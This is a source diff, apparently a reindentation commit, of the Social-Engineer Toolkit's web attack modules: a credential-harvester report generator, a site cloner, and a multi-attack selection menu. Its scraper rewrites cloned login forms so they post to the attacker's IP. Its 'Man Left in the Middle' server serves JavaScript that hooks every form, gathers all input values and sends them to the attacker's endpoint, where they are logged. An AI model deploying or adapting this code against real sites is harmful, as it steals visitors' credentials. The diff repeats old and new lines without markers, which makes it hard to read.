try:
# if we are using ssl
if ssl_flag == 'true':
ssl_server()
# if we are using ssl
if ssl_flag == 'true':
ssl_server()
# if we aren't using ssl
if ssl_flag == 'false':
run()
# if we aren't using ssl
if ssl_flag == 'false':
run()
except:
pass
pass

144
src/webattack/harvester/report_generator.py
View file

@ -30,85 +30,85 @@ fileopen=file("%s/src/program_junk/site.template" % (definepath), "r")
site_template = file("%s/src/program_junk/site.template" % (definepath), "r").readlines()
fileopen1=file("%s/src/core/reports/index.html" % (definepath), "r")
for line in fileopen:
match=re.search("URL=", line)
if match:
url=line.replace("URL=http://", "")
url=line.replace("URL=https://", "")
filewrite2=file("reports/%s.xml" % (now), "a")
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
filewrite2.write(r"<harvester>" + "\n")
for line2 in fileopen1:
counter=0
filewrite=file("reports/%s.html" % (now), "a")
match1=re.search("REPLACEHEREDUDE", line2)
if match1:
line2=line2.replace("REPLACEHEREDUDE", url)
filewrite.write(line2)
url_xml=url.rstrip()
filewrite2.write(" %s" % (url_xml) + "\n")
counter=1
match2=re.search("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", line2)
if match2:
line2=line2.replace("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", "Report findings on %s<br><br>" % (url))
counter=1
filewrite.write(line2)
opentag = True
for line3 in site_template:
match3=re.search("PARAM:", line3)
if match3:
xml=line3.replace("PARAM: ", "")
xml=xml.rstrip()
filewrite.write(line3+"<br>")
if opentag:
filewrite2.write(r" <url>")
opentag = False
filewrite2.write(r" <param>%s</param>" % (xml) + "\n")
match4=re.search("BREAKHERE", line3)
if match4:
filewrite2.write(" </url>" + "\n")
opentag = True
filewrite.write("<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>")
match=re.search("URL=", line)
if match:
url=line.replace("URL=http://", "")
url=line.replace("URL=https://", "")
filewrite2=file("reports/%s.xml" % (now), "a")
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
filewrite2.write(r"<harvester>" + "\n")
for line2 in fileopen1:
counter=0
filewrite=file("reports/%s.html" % (now), "a")
match1=re.search("REPLACEHEREDUDE", line2)
if match1:
line2=line2.replace("REPLACEHEREDUDE", url)
filewrite.write(line2)
url_xml=url.rstrip()
filewrite2.write(" %s" % (url_xml) + "\n")
counter=1
match2=re.search("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", line2)
if match2:
line2=line2.replace("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", "Report findings on %s<br><br>" % (url))
counter=1
filewrite.write(line2)
opentag = True
for line3 in site_template:
match3=re.search("PARAM:", line3)
if match3:
xml=line3.replace("PARAM: ", "")
xml=xml.rstrip()
filewrite.write(line3+"<br>")
if opentag:
filewrite2.write(r" <url>")
opentag = False
filewrite2.write(r" <param>%s</param>" % (xml) + "\n")
match4=re.search("BREAKHERE", line3)
if match4:
filewrite2.write(" </url>" + "\n")
opentag = True
filewrite.write("<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>")
# look for how many people visited the website
match5=re.search("VISITORSHERE", line2)
if match5:
if os.path.isfile("%s/src/program_junk/visits.file" % (definepath)):
fileopen3=file("%s/src/program_junk/visits.file" % (definepath), "r")
counter5=0
for line in fileopen3:
if line != "":
line=line.rstrip()
counter5 = counter5+1
if line == "": counter5 = 0
if not os.path.isfile("%s/src/program_junk/visits.file" % (definepath)):
counter5 = 0
# look for how many people visited the website
match5=re.search("VISITORSHERE", line2)
if match5:
if os.path.isfile("%s/src/program_junk/visits.file" % (definepath)):
fileopen3=file("%s/src/program_junk/visits.file" % (definepath), "r")
counter5=0
for line in fileopen3:
if line != "":
line=line.rstrip()
counter5 = counter5+1
if line == "": counter5 = 0
if not os.path.isfile("%s/src/program_junk/visits.file" % (definepath)):
counter5 = 0
line2=line2.replace("VISITORSHERE", str(counter5), 2)
counter = 1
#filewrite.write(line2)
line2=line2.replace("VISITORSHERE", str(counter5), 2)
counter = 1
#filewrite.write(line2)
match6=re.search("BITESHERE", line2)
if match6:
if os.path.isfile("%s/src/program_junk/bites.file" % (definepath)):
fileopen4=file("%s/src/program_junk/bites.file" % (definepath), "r")
counter5 = 0
for line in fileopen4:
line=line.rstrip()
counter5 = counter5+1
if not os.path.isfile("%s/src/program_junk/bites.file" % (definepath)):
counter5=0
match6=re.search("BITESHERE", line2)
if match6:
if os.path.isfile("%s/src/program_junk/bites.file" % (definepath)):
fileopen4=file("%s/src/program_junk/bites.file" % (definepath), "r")
counter5 = 0
for line in fileopen4:
line=line.rstrip()
counter5 = counter5+1
if not os.path.isfile("%s/src/program_junk/bites.file" % (definepath)):
counter5=0
line2=line2.replace("BITESHERE", str(counter5))
counter = 1
filewrite.write(line2)
line2=line2.replace("BITESHERE", str(counter5))
counter = 1
filewrite.write(line2)
if counter == 0:
filewrite.write(line2)
if counter == 0:
filewrite.write(line2)
try:
filewrite.close()
filewrite2.write(r"</harvester>" + "\n")
filewrite2.close()
filewrite.close()
filewrite2.write(r"</harvester>" + "\n")
filewrite2.close()
except: pass
subprocess.Popen("cp -rf %s/src/core/reports/files reports/" % (definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()

26
src/webattack/harvester/scraper.py
View file

@ -6,7 +6,7 @@ import re
import subprocess
import urlparse
import shutil
from src.core.setcore import *
from src.core.setcore import *
#
@ -15,10 +15,10 @@ from src.core.setcore import *
# grab ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
# set the multiattack tabnabbing/webjacking flag
multi_tabnabbing="off"
@ -49,7 +49,7 @@ apache_mode = check_config("APACHE_SERVER=").lower()
track_user = check_config("TRACK_EMAIL_ADDRESSES=").lower()
if track_user == "on":
apache_mode = "on"
apache_mode = "on"
apache_rewrite = ""
# if we are turned on, change this
@ -68,17 +68,17 @@ for line in fileopen:
method_post=re.search("method=post", line, flags=re.IGNORECASE)
if match or method_post:
# regex for now, can probably use htmlparser later, but right not what its doing is
# replacing any url on the "action" field with your victim IP which will have a custom
# web server running to post the data to your site
# regex for now, can probably use htmlparser later, but right not what its doing is
# replacing any url on the "action" field with your victim IP which will have a custom
# web server running to post the data to your site
if ssl_flag == 'false':
line=re.sub('action="http?\w://[\w.\?=/&]*/', 'action="http://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
if ssl_flag == 'true':
line=re.sub('action="http?\w://[\w.\?=/&]*/', 'action="https://%s/' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
if apache_mode == "on":
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
@ -90,4 +90,4 @@ filewrite.close()
# move our newly created website with our post stuff to our cloned area
if os.path.isfile("src/program_junk/web_clone/index.html.new"):
shutil.move("src/program_junk/web_clone/index.html.new", "src/program_junk/web_clone/%s" % (site))
shutil.move("src/program_junk/web_clone/index.html.new", "src/program_junk/web_clone/%s" % (site))

2
src/webattack/java_applet/sign_jar.py
View file

@ -28,4 +28,4 @@ Is this correct: yes
subprocess.Popen("cp Java_Obf.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print "[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)"
except:
pass
pass

319
src/webattack/mlitm/thebiz.py
View file

@ -34,11 +34,11 @@ from src.core import setcore
fileopen=file("config/set_config" , "r").readlines()
counter=0
for line in fileopen:
line=line.rstrip()
match=re.search("MLITM_PORT=", line)
if match:
port=line.replace("MLITM_PORT=", "")
counter=1
line=line.rstrip()
match=re.search("MLITM_PORT=", line)
if match:
port=line.replace("MLITM_PORT=", "")
counter=1
# if nada default port 80
if counter == 0: web_port=8000
@ -51,161 +51,161 @@ reports = "./reports"
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
if re.search("^https?:\/\/(:?localhost|127)", self.headers["Referer"]) is None:
if self.path == '/':
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
print '[-] Grabbing payload from %s' % self.headers["Referer"]
self.prep_payload()
self.wfile.write(self.send_payload())
print '[-] Exploit sent to %s' % self.client_address[0]
elif self.path[0:11] == '/spacer.gif':
print '[*] Receiving data from %s' % self.client_address[0]
self.referer_host = self.headers["Referer"].replace("https://","").replace("http://","")
self.referer_host = self.referer_host.split("/")[0].split(".")
self.referer_host = self.referer_host[-2]+"."+self.referer_host[-1]
print self.referer_host
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
self.capture()
else:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
except KeyError:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
def do_GET(self):
def send_payload(self):
return self.payload
def prep_payload(self):
js_payload = {}
js_payload[0] = """
function func() {
document.getElementsByTagName('body')[0].innerHTML = \""""
js_payload[2] = """\";
var formslength =document.getElementsByTagName('form').length;
for(var i=0; i<formslength; i++){
document.forms[i].setAttribute('onsubmit', 'myOnSubmit('+i+')');
}
try:
if re.search("^https?:\/\/(:?localhost|127)", self.headers["Referer"]) is None:
if self.path == '/':
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
print '[-] Grabbing payload from %s' % self.headers["Referer"]
self.prep_payload()
self.wfile.write(self.send_payload())
print '[-] Exploit sent to %s' % self.client_address[0]
elif self.path[0:11] == '/spacer.gif':
print '[*] Receiving data from %s' % self.client_address[0]
self.referer_host = self.headers["Referer"].replace("https://","").replace("http://","")
self.referer_host = self.referer_host.split("/")[0].split(".")
self.referer_host = self.referer_host[-2]+"."+self.referer_host[-1]
print self.referer_host
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
self.capture()
else:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
except KeyError:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
def send_payload(self):
return self.payload
def prep_payload(self):
js_payload = {}
js_payload[0] = """
function func() {
document.getElementsByTagName('body')[0].innerHTML = \""""
js_payload[2] = """\";
var formslength =document.getElementsByTagName('form').length;
for(var i=0; i<formslength; i++){
document.forms[i].setAttribute('onsubmit', 'myOnSubmit('+i+')');
}
function myOnSubmit(form) {
data = \"\";
for (i=0; i < document.forms[form].getElementsByTagName(\"input\").length; i++){
data = data+document.forms[form].getElementsByTagName(\"input\")[i].name+\"=\"+document.forms[form].getElementsByTagName(\"input\")[i].value+\"&\";
}
var img = document.createElement('img');
img.src = \""""
js_payload[4] = """?\"+data+\"\";
img.setAttribute('width', '100%');
img.setAttribute('height', '100%');
document.getElementsByTagName('body')[0].appendChild(img);
pause(500);
return true;
}
function pause(milsec){
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < milsec);
}
func();
document.execCommand('Stop');
"""
js_payload[1] = str(self.served())
js_payload[1] = js_payload[1].replace("\"","\\\"")
js_payload[3] = "http://"+self.headers["host"]+"/spacer.gif"
full_payload = ""
js_payload[1] = js_payload[1].replace("\t","").replace("\n","").replace("\r","")
for i in js_payload:
full_payload += str(js_payload[i])
self.payload = full_payload
def served(self):
t = urllib2.urlopen(self.headers["Referer"])
html = t.read()
soup = BeautifulSoup.BeautifulSoup(html)
body = soup.find(["body"])
return body
}
def capture(self):
self.generated_on = str(datetime.datetime.now())
self.path = self.path.split("?")[1].split(" ")[0]
dict = urlparse.parse_qs(self.path)
meta = {}
meta['ip'] = self.client_address
meta['browser'] = [self.headers["User-Agent"]]
meta['referer'] = [self.headers["Referer"]]
print "[+] Generating XML.."
root = Element('XSS')
root.set('version', '1.0')
request = SubElement(root, 'request')
site = SubElement(request, 'site')
site.text = self.address_string()
date = SubElement(request, 'date')
date.text = self.generated_on
requestLine = SubElement(request, 'requestLine')
requestLine.text = self.requestline
metaData = SubElement(request, 'meta')
for key, value in meta.iteritems():
ele = SubElement(metaData, key)
ele.text = value[0]
formData = SubElement(request, 'formData')
print '[*] Data received:'
for key, value in dict.iteritems():
if key == "":
key = "UNDEFINED"
print '[-] \t '+ str(key)+' => '+str(value)
ele = SubElement(formData, key)
ele.text = value[0]
self.log_data(self.prettify(root))
function myOnSubmit(form) {
data = \"\";
for (i=0; i < document.forms[form].getElementsByTagName(\"input\").length; i++){
data = data+document.forms[form].getElementsByTagName(\"input\")[i].name+\"=\"+document.forms[form].getElementsByTagName(\"input\")[i].value+\"&\";
}
var img = document.createElement('img');
img.src = \""""
js_payload[4] = """?\"+data+\"\";
img.setAttribute('width', '100%');
img.setAttribute('height', '100%');
document.getElementsByTagName('body')[0].appendChild(img);
pause(500);
return true;
}
function pause(milsec){
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < milsec);
}
func();
document.execCommand('Stop');
"""
js_payload[1] = str(self.served())
js_payload[1] = js_payload[1].replace("\"","\\\"")
js_payload[3] = "http://"+self.headers["host"]+"/spacer.gif"
full_payload = ""
js_payload[1] = js_payload[1].replace("\t","").replace("\n","").replace("\r","")
for i in js_payload:
full_payload += str(js_payload[i])
self.payload = full_payload
def served(self):
t = urllib2.urlopen(self.headers["Referer"])
html = t.read()
soup = BeautifulSoup.BeautifulSoup(html)
body = soup.find(["body"])
return body
def capture(self):
self.generated_on = str(datetime.datetime.now())
self.path = self.path.split("?")[1].split(" ")[0]
dict = urlparse.parse_qs(self.path)
meta = {}
meta['ip'] = self.client_address
meta['browser'] = [self.headers["User-Agent"]]
meta['referer'] = [self.headers["Referer"]]
print "[+] Generating XML.."
root = Element('XSS')
root.set('version', '1.0')
request = SubElement(root, 'request')
site = SubElement(request, 'site')
site.text = self.address_string()
date = SubElement(request, 'date')
date.text = self.generated_on
requestLine = SubElement(request, 'requestLine')
requestLine.text = self.requestline
metaData = SubElement(request, 'meta')
for key, value in meta.iteritems():
ele = SubElement(metaData, key)
ele.text = value[0]
def prettify(self,elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = ElementTree.tostring(elem, 'utf-8')
reparsed = minidom.parseString(rough_string)
return reparsed.toprettyxml(indent=" ")
formData = SubElement(request, 'formData')
def log_data(self,data):
report = open(reports+"/"+self.referer_host+"_"+self.generated_on.replace(" ","_").replace(":",".")+".xml","w+")
report.write(data)
report.close
print '[*] Data received:'
for key, value in dict.iteritems():
if key == "":
key = "UNDEFINED"
print '[-] \t '+ str(key)+' => '+str(value)
ele = SubElement(formData, key)
ele.text = value[0]
self.log_data(self.prettify(root))
def prettify(self,elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = ElementTree.tostring(elem, 'utf-8')
reparsed = minidom.parseString(rough_string)
return reparsed.toprettyxml(indent=" ")
def log_data(self,data):
report = open(reports+"/"+self.referer_host+"_"+self.generated_on.replace(" ","_").replace(":",".")+".xml","w+")
report.write(data)
report.close
print setcore.bcolors.BLUE + "\n***************************************************"
@ -214,10 +214,9 @@ print setcore.bcolors.BLUE + "**************************************************
print setcore.bcolors.BLUE + "Man Left in the Middle Attack brought to you by:\nKyle Osborn - kyle@kyleosborn.com" + setcore.bcolors.ENDC
print "\nStarting server on %s:%s..." % (bind,port)
try:
serv = HTTPServer((bind, int(port)), RequestHandler)
print setcore.bcolors.GREEN + "[*] Server has started" + setcore.bcolors.ENDC
serv.serve_forever()
serv = HTTPServer((bind, int(port)), RequestHandler)
print setcore.bcolors.GREEN + "[*] Server has started" + setcore.bcolors.ENDC
serv.serve_forever()
except Exception, e:
print e
print "Failed to start webserver.\n\nMake sure you have the permissions to bind on %s:%s" % (bind,port)
print e
print "Failed to start webserver.\n\nMake sure you have the permissions to bind on %s:%s" % (bind,port)

542
src/webattack/multi_attack/multiattack.py
View file

@ -34,17 +34,17 @@ webjacking="off"
# turning flag on
def flag_on(vector):
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
# turning flag off
def flag_off(vector):
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.RED + "OFF" + bcolors.ENDC)
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.RED + "OFF" + bcolors.ENDC)
# filewriting
def write_file(filename,results):
filewrite=file("src/program_junk/%s" % (filename), "w")
filewrite.write(results)
filewrite.close()
filewrite=file("src/program_junk/%s" % (filename), "w")
filewrite.write(results)
filewrite.close()
# specify attackvector
filewrite=file("src/program_junk/attack_vector","w")
@ -73,13 +73,13 @@ clonedurl = 0
fileopen = file("%s/src/program_junk/site.template" % (definepath), "r")
data = fileopen.read()
if "TEMPLATE=SELF" in data:
clonedurl = 1
clonedurl = 1
# clean up cloner directory
if clonedurl == 0:
subprocess.Popen("rm -rf src/program_junk/web_clone;mkdir src/program_junk/web_clone/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("rm -rf src/program_junk/web_clone;mkdir src/program_junk/web_clone/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# set a quick loop to see what the user wants
# set a quick loop to see what the user wants
a=1
print ("""
@ -91,219 +91,219 @@ print ("""
The multi attack vector utilizes each combination of attacks
and allow the user to choose the method for the attack. Once
you select one of the attacks, it will be added to your
you select one of the attacks, it will be added to your
attack profile to be used to stage the attack vector. When
your finished be sure to select the 'I'm finished' option.""")
print("""\nSelect which attacks you want to use:
""")
while a==1:
trigger=""
print " 1. Java Applet Attack Method" + toggleflag_java
print " 2. Metasploit Browser Exploit Method" + toggleflag_meta
print " 3. Credential Harvester Attack Method" + toggleflag_harv
print " 4. Tabnabbing Attack Method" + toggleflag_tabnab
print " 5. Man Left in the Middle Attack Method" + toggleflag_mlitm
print " 6. Web Jacking Attack Method" + toggleflag_webjacking
print " 7. Use them all - A.K.A. 'Tactical Nuke'"
print " 8. I'm finished and want to proceed with the attack"
print "\n 99. Return to Main Menu\n"
trigger=""
print " 1. Java Applet Attack Method" + toggleflag_java
print " 2. Metasploit Browser Exploit Method" + toggleflag_meta
print " 3. Credential Harvester Attack Method" + toggleflag_harv
print " 4. Tabnabbing Attack Method" + toggleflag_tabnab
print " 5. Man Left in the Middle Attack Method" + toggleflag_mlitm
print " 6. Web Jacking Attack Method" + toggleflag_webjacking
print " 7. Use them all - A.K.A. 'Tactical Nuke'"
print " 8. I'm finished and want to proceed with the attack"
print "\n 99. Return to Main Menu\n"
profile=raw_input(setprompt(["2","16"], "Enter selections one at a time (8 to finish)"))
profile=raw_input(setprompt(["2","16"], "Enter selections one at a time (8 to finish)"))
if profile == "": profile = "7"
# if the option is something other than 1-7 flag invalid option
# this will make sure its an integer, if not assign an 9 which will trigger invalid option
try: # this will trigger an error if it isnt an integer
profile=int(profile)
# convert it back
profile=str(profile)
# if it triggers an exception reassign profile to option 8
except: profile = "10"
if profile == "": profile = "7"
# if the option is something other than 1-7 flag invalid option
# this will make sure its an integer, if not assign an 9 which will trigger invalid option
try: # this will trigger an error if it isnt an integer
profile=int(profile)
# convert it back
profile=str(profile)
# if it triggers an exception reassign profile to option 8
except: profile = "10"
# if you want to return to main menu
if profile == "99":
break
# if you want to return to main menu
if profile == "99":
break
# trigger invalid option
if int(profile) >= 10:
raw_input("\nInvalid option..")
return_continue()
# trigger invalid option
if int(profile) >= 10:
raw_input("\nInvalid option..")
return_continue()
if profile == "7":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
print bcolors.RED + (r"""
..-^~~~^-..
.~ ~.
(;: :;)
(: :)
':._ _.:'
| |
(=====)
| |
| |
| |
((/ \))""") + bcolors.ENDC
if profile == "7":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
print bcolors.RED + (r"""
..-^~~~^-..
.~ ~.
(;: :;)
(: :)
':._ _.:'
| |
(=====)
| |
| |
| |
((/ \))""") + bcolors.ENDC
print "\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?"
print "\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n"
java_applet="on"
meta_attack="on"
harvester="on"
break
print "\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?"
print "\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n"
java_applet="on"
meta_attack="on"
harvester="on"
break
if profile == "8":
break
if profile == "8":
break
# java applet on/off
if profile == "1":
if java_applet == "off":
flag_on("Java Applet")
return_menu()
java_applet="on"
trigger=1
#toggle_flags here
toggleflag_java=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
# java applet on/off
if profile == "1":
if java_applet == "off":
flag_on("Java Applet")
return_menu()
java_applet="on"
trigger=1
#toggle_flags here
toggleflag_java=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if java_applet == "on":
if trigger != 1:
flag_off("Java Applet")
return_menu()
java_applet="off"
# toggle flags here
toggleflag_java=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if java_applet == "on":
if trigger != 1:
flag_off("Java Applet")
return_menu()
java_applet="off"
# toggle flags here
toggleflag_java=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# metasploit client_side on/off
if profile == "2":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
if meta_attack=="off":
flag_on("Metasploit Client Side")
return_menu()
meta_attack="on"
trigger=1
# toggle flags here
toggleflag_meta=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
# metasploit client_side on/off
if profile == "2":
if operating_system == "windows":
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
if meta_attack=="off":
flag_on("Metasploit Client Side")
return_menu()
meta_attack="on"
trigger=1
# toggle flags here
toggleflag_meta=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if meta_attack=="on":
if trigger != 1:
flag_off("Metasploit Client Side")
return_menu()
meta_attack="off"
# toggle flags here
toggleflag_meta=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if meta_attack=="on":
if trigger != 1:
flag_off("Metasploit Client Side")
return_menu()
meta_attack="off"
# toggle flags here
toggleflag_meta=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# harvester on/off
if profile == "3":
if harvester == "off":
flag_on("Harvester")
return_menu()
harvester="on"
trigger=1
# toggle flags here
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# harvester on/off
if profile == "3":
if harvester == "off":
flag_on("Harvester")
return_menu()
harvester="on"
trigger=1
# toggle flags here
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if harvester == "on":
if trigger != 1:
flag_off("Harvester")
return_menu()
harvester="off"
# toggle flags here
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if harvester == "on":
if trigger != 1:
flag_off("Harvester")
return_menu()
harvester="off"
# toggle flags here
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# if tabnabbing is enabled, no need for harvester to be enabled as well
if profile == "4":
if tabnabbing == "off":
flag_on("Tabnabbing")
return_menu()
tabnabbing="on"
trigger=1
harvester="on"
# toggle flags here
toggleflag_tabnab=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
print webjacking
if webjacking == "on":
webjacking = "off"
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# if tabnabbing is enabled, no need for harvester to be enabled as well
if profile == "4":
if tabnabbing == "off":
flag_on("Tabnabbing")
return_menu()
tabnabbing="on"
trigger=1
harvester="on"
# toggle flags here
toggleflag_tabnab=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
print webjacking
if webjacking == "on":
webjacking = "off"
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if tabnabbing == "on":
if trigger != 1:
flag_off("Tabnabbing")
return_menu()
tabnabbing="off"
harvester="off"
# toggle flags here
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if tabnabbing == "on":
if trigger != 1:
flag_off("Tabnabbing")
return_menu()
tabnabbing="off"
harvester="off"
# toggle flags here
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# turn man left in the middle to on
if profile== "5":
# turn man left in the middle to on
if profile== "5":
if mlitm == "off":
flag_on("Man Left in the Middle")
mlitm="on"
return_menu()
trigger=1
if harvester == "on" or tabnabbing == "on":
print "[*] You cannot use MLITM and Harvester/Tabnabbing in the same attack!"
print "[*] Disabling Harvesting and/or Tabnabbing"
harvester="off"
tabnabbing="off"
# toggle flags here
toggleflag_mlitm=(bcolors.GREEN+" (ON)"+ bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if mlitm == "off":
flag_on("Man Left in the Middle")
mlitm="on"
return_menu()
trigger=1
if harvester == "on" or tabnabbing == "on":
print "[*] You cannot use MLITM and Harvester/Tabnabbing in the same attack!"
print "[*] Disabling Harvesting and/or Tabnabbing"
harvester="off"
tabnabbing="off"
# toggle flags here
toggleflag_mlitm=(bcolors.GREEN+" (ON)"+ bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if mlitm == "on":
if trigger != 1:
flag_off("Man Left in the Middle")
return_menu()
mlitm="off"
# toggle flags here
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if mlitm == "on":
if trigger != 1:
flag_off("Man Left in the Middle")
return_menu()
mlitm="off"
# toggle flags here
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# turn webjacking on
if profile== "6":
# turn webjacking on
if profile== "6":
if webjacking == "off":
flag_on("Web Jacking")
webjacking="on"
return_menu()
trigger=1
if tabnabbing == "on" or mlitm == "on":
print "[*] You cannot use MLITM and Tabnabbing in the same attack!"
print "[*] Disabling MLITM and/or Tabnabbing"
mlitm="off"
tabnabbing="off"
harvester="on"
# toggle flags here
toggleflag_mlitm=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if harvester == "off":
harvester="on"
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_webjacking=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if webjacking == "off":
flag_on("Web Jacking")
webjacking="on"
return_menu()
trigger=1
if tabnabbing == "on" or mlitm == "on":
print "[*] You cannot use MLITM and Tabnabbing in the same attack!"
print "[*] Disabling MLITM and/or Tabnabbing"
mlitm="off"
tabnabbing="off"
harvester="on"
# toggle flags here
toggleflag_mlitm=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if harvester == "off":
harvester="on"
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_webjacking=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
if webjacking == "on":
if trigger != 1:
flag_off("Web Jacking")
return_menu()
webjacking="off"
# toggle flags here
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
if webjacking == "on":
if trigger != 1:
flag_off("Web Jacking")
return_menu()
webjacking="off"
# toggle flags here
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
# next series of flags needed
@ -311,114 +311,114 @@ payloadgen=0
# write handler files for detection
if java_applet == "on":
write_file("multi_java","multiattack=java_on")
write_file("multi_java","multiattack=java_on")
if meta_attack == "on":
write_file("multi_meta","multiattack=meta_on")
write_file("multi_meta","multiattack=meta_on")
if tabnabbing == "on":
write_file("multi_tabnabbing","multiattack=tabnabbing_on")
write_file("multi_tabnabbing","multiattack=tabnabbing_on")
if harvester == "on":
write_file("multi_harvester","multiattack=harvester_on")
write_file("multi_harvester","multiattack=harvester_on")
if mlitm == "on":
write_file("multi_mlitm","multiattack=mlitm_on")
write_file("multi_mlitm","multiattack=mlitm_on")
if webjacking == "on":
write_file("multi_webjacking","multiattack=webjacking_on")
write_file("multi_webjacking","multiattack=webjacking_on")
# hit cloner flag
# if any of the flags are turned on, then trigger to see if ARP Cache needs to be enabled
